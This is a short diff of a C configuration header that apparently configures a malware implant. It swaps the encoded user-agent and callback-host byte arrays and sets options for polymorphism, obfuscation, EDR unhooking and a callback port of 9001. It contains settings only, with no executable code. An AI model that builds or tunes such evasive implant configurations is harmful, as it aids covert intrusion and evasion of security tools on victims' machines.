@@ -1,13 +1,13 @@
 
-#define CONFIG_USER_AGENT {0x03, 0x1a, 0x98, 0x99, 0x93, 0x9b, 0x15, 0x3a, 0xbf, 0x3a, 0x3d, 0xbd, 0x31, 0x86, 0x91, 0x1a, 0x17, 0x9a, 0x9e, 0x14, 0xb5, 0x8a, 0x0f, 0xbd, 0x3e, 0xba, 0x3d, 0x30, 0xb5, 0x86, 0x82, 0x06, 0xbe, 0xb7, 0x31, 0x3d, 0x05, 0x15, 0x1d, 0x9b, 0x17, 0x06, 0x97, 0x1c, 0x00, 0x19, 0x9f, 0xba, 0xbf, 0x34, 0xbe, 0x3a, 0x3c, 0x36, 0x35, 0xb9, 0x00, 0x09, 0x0f, 0x8b, 0x83, 0xbb, 0x35, 0x9b, 0x11, 0x18, 0x97, 0x3d, 0x06, 0x1f, 0x94, 0x18, 0x92, 0x39, 0xb5, 0x8c, 0x91, 0x94, 0x12, 0x1b, 0x97, 0x3a, 0xb9, 0x36, 0x32, 0xb5, 0x32, 0xb7, 0x3e, 0xb6, 0x3f, 0xba, 0x3d, 0x35, 0xbd, 0xbd, 0x0c, 0x1d, 0x96, 0x9d, 0x9c, 0x99, 0xb2, 0x37, 0xbc, 0x36, 0xb2, 0xb4, 0xbe, 0xad}
-#define CONFIG_HOST {0xbd, 0x31, 0xbc, 0xba, 0x3d, 0x36, 0x39, 0xba, 0x3d, 0xba, 0x3d, 0x31, 0x25}
+#define CONFIG_USER_AGENT {0x8c, 0x0d, 0x17, 0x8e, 0x1c, 0x8c, 0x9a, 0x2d, 0x30, 0x2d, 0xb2, 0xaa, 0xbe, 0x91, 0x1e, 0x0d, 0x98, 0x8d, 0x11, 0x03, 0x3a, 0x9d, 0x80, 0xaa, 0xb1, 0xad, 0xb2, 0x27, 0x3a, 0x91, 0x0d, 0x11, 0x31, 0xa0, 0xbe, 0x2a, 0x8a, 0x02, 0x92, 0x8c, 0x98, 0x11, 0x18, 0x0b, 0x8f, 0x0e, 0x10, 0xad, 0x30, 0x23, 0x31, 0x2d, 0xb3, 0x21, 0xba, 0xae, 0x8f, 0x1e, 0x80, 0x9c, 0x0c, 0xac, 0xba, 0x8c, 0x9e, 0x0f, 0x18, 0x2a, 0x89, 0x08, 0x1b, 0x0f, 0x1d, 0x2e, 0x3a, 0x9b, 0x1e, 0x83, 0x9d, 0x0c, 0x18, 0x2d, 0x36, 0x21, 0xbd, 0xa2, 0xbd, 0xa0, 0xb1, 0xa1, 0xb0, 0xad, 0xb2, 0x22, 0x32, 0xaa, 0x83, 0x0a, 0x19, 0x8a, 0x13, 0x8e, 0x3d, 0x20, 0x33, 0x21, 0x3d, 0xa3, 0x31, 0xba}
+#define CONFIG_HOST {0xb2, 0x26, 0x33, 0xad, 0xb2, 0x21, 0xb6, 0xad, 0xb2, 0xad, 0xb2, 0x26, 0xaa}
 #define CONFIG_PORT 9001
 #define CONFIG_SECURE FALSE
 #define CONFIG_SLEEP 3
 #define CONFIG_POLYMORPHIC TRUE
 #define CONFIG_OBFUSCATION TRUE
 #define CONFIG_ARCH 64
-#define CONFIG_NATIVE TRUE
+#define CONFIG_NATIVE FALSE
 #define CONFIG_ANTI_DEBUG FALSE
-#define CONFIG_UNHOOK 0
+#define CONFIG_UNHOOK 2
 #define CONFIG_MAKE 0
